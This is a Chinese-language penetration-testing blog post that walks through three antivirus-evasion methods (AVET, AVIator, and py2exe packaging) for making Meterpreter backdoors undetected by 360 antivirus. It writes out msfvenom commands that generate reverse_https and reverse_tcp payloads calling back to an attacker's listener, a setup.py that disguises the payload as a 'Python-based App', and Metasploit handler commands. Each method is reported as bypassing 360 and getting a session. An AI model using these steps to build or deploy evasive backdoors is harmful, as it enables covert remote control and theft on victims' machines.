前言
在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。这里推荐三款免杀工具(亲测有效)
实验环境
windows 7 (安装360)(IP:10.211.55.4)
kali (IP:10.211.55.10)
AVET工具
安装
参考资料 AVET安装使用
也是傻瓜式安装在kali上,不多说。
使用
参考 github
使用前可以修改一下LHOST、LPORT,来方便生成payload。
vim global_connect_config.sh
编辑该文件,修改为kali的IP和自定义端口
输入该命令可运行AVET
python3 avet_fabric.py
任意选择一个脚本,这里我选择的4
然后以下选项全部默认。
注意msfvenom的命令生成的payload。
会在output文件夹生成output.exe。
测试可过360
AVIator工具
AVIator是后门生成器实用程序,使用加密和注入技术来绕过AV检测。
安装
直接从github上下载就可以
https://github.com/Ch0pin/AVIator
使用
将msfvenom生成的shellcode输入到该工具的payload里。AES KEY和IV默认就可以
点击Encrypt,生成加密后的payload。
msfvenom -p windows/meterpreter/reverse_https LHOST=10.211.55.10 LPORT=4444 -f csharp
目标操作系统根据实际情况选择,这里选择x86通用一些。
这里选择注入类型,在内存中创建新类型。
另外也可以自定义图标。
更多参考:
远控免杀专题(14)-AVIator(VT免杀率25/69)
AVIator -- Bypass AV tool
点击generate exe后就可以生成exe后门程序了。
运行后可成功上线。
测试可过360。
python打包exe
网上有很多靠python第三方工具来达到免杀效果的文章,也有python加载shellcode之类的文章。有pyinstaller、py2exe。这里说一种打包的方式Py2exe,pyinstaller还正在实验。
参考文章msfvenom免杀木马
在windows7安装32位的python3.4和py2exe
利用msfvenom生成py脚本
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.197.156 lport=443 -f raw -o /tmp/py.py
创建setup.py
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['py.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)
替换console文件名,命令打包生成exe
python setup.py py2exe
使用msf
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set exitonsession false
exploit -j -z
测试可过360。
总结
多几个免杀工具是错不了的。当然会对shellcode编写、加密、变异等方法更香。
